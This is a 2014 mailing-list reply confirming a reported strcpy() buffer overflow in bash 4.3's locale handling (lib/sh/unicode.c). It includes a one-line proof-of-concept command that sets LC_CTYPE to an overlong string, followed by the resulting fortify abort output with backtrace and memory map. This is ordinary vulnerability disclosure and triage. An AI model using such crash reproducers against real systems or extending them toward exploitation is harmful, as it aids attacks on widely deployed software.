Re: Potential vulnerabilities in BASH 4.3

Mon, 11 Aug 2014 18:11:32 -0700 

On Mon 11 Aug 2014 21:07:06 Hádrian R wrote:
> Hi, I'm Hádrien Romero Soria - @Kaiwaiata​​, I am a 16 year old boy,
> passionate about computer security, since more than 8h searching and
> finding various possible vulnerabilities in source code of bash..
> I will tell you one vulnerability now, if they treat me well I will tell
> the other..
> 
> foolish or important things?
> 
> unsafe use of *strcpy():*
> 
> bash-4.3.tar\bash-4.3\lib\sh\unicode.c:
> *line 87: *strcpy (charsetbuf, locale);
> 
> *#* if an attacker manages to take control of *charsetbuf[40];*, may cause
> a buffer overflow, which would be directed toward *.bss *it's not too
> dangerous but is a vulnerability.

depending on the build system, yes, you can trigger a buffer overflow here.
all you have to do is set LC_CTYPE to a long string.  like so:
$ bash -c "LC_CTYPE='$(printf %100sf)' printf '\U8f7f7f20'"
bash: warning: setlocale: LC_CTYPE: cannot change locale (                      
                                                                              
f): No such file or directory
*** buffer overflow detected ***: bash terminated
======= Backtrace: =========
/lib64/libc.so.6(+0x759fb)[0x7f26630e59fb]
/lib64/libc.so.6(__fortify_fail+0x47)[0x7f266316fde7]
/lib64/libc.so.6(+0xfdcd0)[0x7f266316dcd0]
bash[0x47e3ec]
bash[0x46e1bd]
bash[0x46eec1]
bash[0x41c28e]
bash[0x41e454]
bash[0x41f526]
bash[0x461f24]
bash[0x4098c4]
bash[0x408786]
/lib64/libc.so.6(__libc_start_main+0xf0)[0x7f2663090050]
bash[0x40947b]
======= Memory map: ========
00400000-004ae000 r-xp 00000000 08:32 1311338                            
/bin/bash
006ad000-006ae000 r--p 000ad000 08:32 1311338                            
/bin/bash
006ae000-006b2000 rw-p 000ae000 08:32 1311338                            
/bin/bash
006b2000-006bc000 rw-p 00000000 00:00 0 
01e34000-01e55000 rw-p 00000000 00:00 0                                  [heap]
7f2662a8d000-7f2662aa3000 r-xp 00000000 08:32 1864333                    
/usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662aa3000-7f2662ca2000 ---p 00016000 08:32 1864333                    
/usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca2000-7f2662ca3000 r--p 00015000 08:32 1864333                    
/usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca3000-7f2662ca4000 rw-p 00016000 08:32 1864333                    
/usr/lib/gcc-lib/x86_64-pc-linux-gnu/4.9.0/libgcc_s.so.1
7f2662ca4000-7f2663070000 r--p 00000000 08:32 6705881                    
/usr/lib64/locale/locale-archive
7f2663070000-7f2663215000 r-xp 00000000 08:32 4459482                    
/lib64/libc-2.19.so
7f2663215000-7f2663415000 ---p 001a5000 08:32 4459482                    
/lib64/libc-2.19.so
7f2663415000-7f2663419000 r--p 001a5000 08:32 4459482                    
/lib64/libc-2.19.so
7f2663419000-7f266341b000 rw-p 001a9000 08:32 4459482                    
/lib64/libc-2.19.so
7f266341b000-7f266341f000 rw-p 00000000 00:00 0 
7f266341f000-7f266346e000 r-xp 00000000 08:32 4460698                    
/lib64/libncurses.so.5.9
7f266346e000-7f266366e000 ---p 0004f000 08:32 4460698                    
/lib64/libncurses.so.5.9
7f266366e000-7f2663672000 r--p 0004f000 08:32 4460698                    
/lib64/libncurses.so.5.9
7f2663672000-7f2663673000 rw-p 00053000 08:32 4460698                    
/lib64/libncurses.so.5.9
7f2663673000-7f2663674000 rw-p 00000000 00:00 0 
7f2663674000-7f266367c000 r-xp 00000000 08:32 4458169                    
/lib64/libhistory.so.6.3
7f266367c000-7f266387c000 ---p 00008000 08:32 4458169                    
/lib64/libhistory.so.6.3
7f266387c000-7f266387d000 r--p 00008000 08:32 4458169                    
/lib64/libhistory.so.6.3
7f266387d000-7f266387e000 rw-p 00009000 08:32 4458169                    
/lib64/libhistory.so.6.3
7f266387e000-7f26638bf000 r-xp 00000000 08:32 4458167                    
/lib64/libreadline.so.6.3
7f26638bf000-7f2663abf000 ---p 00041000 08:32 4458167                    
/lib64/libreadline.so.6.3
7f2663abf000-7f2663ac1000 r--p 00041000 08:32 4458167                    
/lib64/libreadline.so.6.3
7f2663ac1000-7f2663ac7000 rw-p 00043000 08:32 4458167                    
/lib64/libreadline.so.6.3
7f2663ac7000-7f2663ac9000 rw-p 00000000 00:00 0 
7f2663ac9000-7f2663aeb000 r-xp 00000000 08:32 4459479                    
/lib64/ld-2.19.so
7f2663c72000-7f2663c76000 rw-p 00000000 00:00 0 
7f2663ce0000-7f2663ce2000 rw-p 00000000 00:00 0 
7f2663ce2000-7f2663ce9000 r--s 00000000 08:32 6705883                    
/usr/lib64/gconv/gconv-modules.cache
7f2663ce9000-7f2663cea000 rw-p 00000000 00:00 0 
7f2663cea000-7f2663ceb000 r--p 00021000 08:32 4459479                    
/lib64/ld-2.19.so
7f2663ceb000-7f2663cec000 rw-p 00022000 08:32 4459479                    
/lib64/ld-2.19.so
7f2663cec000-7f2663ced000 rw-p 00000000 00:00 0 
7fff04d0e000-7fff04d30000 rw-p 00000000 00:00 0                          [stack]
7fff04dff000-7fff04e00000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  
[vsyscall]
Aborted (core dumped)
-mike

Attachment: signature.asc
Description: This is a digitally signed message part.

Reply via email to